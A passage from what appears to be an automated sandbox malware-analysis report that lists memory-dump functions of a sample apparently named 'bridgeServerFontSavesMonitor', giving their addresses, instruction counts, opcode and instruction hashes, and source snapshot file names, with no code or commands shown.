                                                            • Opcode ID: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction ID: 3e927211c3c7800c72d106962f86ee1e44214be734c1e76048084bc6e357b956
                                                            • Opcode Fuzzy Hash: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction Fuzzy Hash: CE019235A0E38D9FD721DFA4885419CBFB1AF42710F1641E7D088DB1A2D9746645C754
                                                            Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002B.00000002.2214617129.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_43_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction ID: a9ce8ca3fe444f8aa684a8f1104411b1f7a58184a331befda5c01c2d4e37fcd5
                                                            • Opcode Fuzzy Hash: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction Fuzzy Hash: FE018F34E0E38D9FE731DFA488A419CBFB1AF06714F1541E7D488CB1A2D9786A44C755
                                                            Function 00007FFD9BAA3C45 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002B.00000002.2214617129.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_43_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 831112fee4d30cdc9f2e9384aae8db6293787c40afac43b45b6311e5eeb9805e
                                                            • Instruction ID: a0d0b214b94ef8bcb7dff00981a52ae8be16fe8c2c4f5e1a54c6cc89d08a2dbc
                                                            • Opcode Fuzzy Hash: 831112fee4d30cdc9f2e9384aae8db6293787c40afac43b45b6311e5eeb9805e
                                                            • Instruction Fuzzy Hash: 8EE09261F1AC1E5FE6F4E75C84753B862D3EBAC700F420176C00DC32A1DD682D024794
                                                            Function 00007FFD9BAA6A11 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002B.00000002.2214617129.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_43_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: 592830685c710e191fb463840f7aeedee90a1c284bcab971093a6569cda1cf6c
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: C4E01220F0901E4BFBB4A794C8607B962A2AF99704F1640B4D80DD33E2DDB86F858755
                                                            Function 00007FFD9BAA0835 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002B.00000002.2214617129.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_43_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 410e05bf80eb868e35b7a61e13c3ebda97f337d5ee954246124ba18280ece236
                                                            • Instruction ID: 4ca0cf5f36246c5a70c8128036d966815203504818490876a24fa534440c4671
                                                            • Opcode Fuzzy Hash: 410e05bf80eb868e35b7a61e13c3ebda97f337d5ee954246124ba18280ece236
                                                            • Instruction Fuzzy Hash: 98C01210B5740D51D43473AEEC664EDB741AF4811CF864171E40D84096DC491587C1AA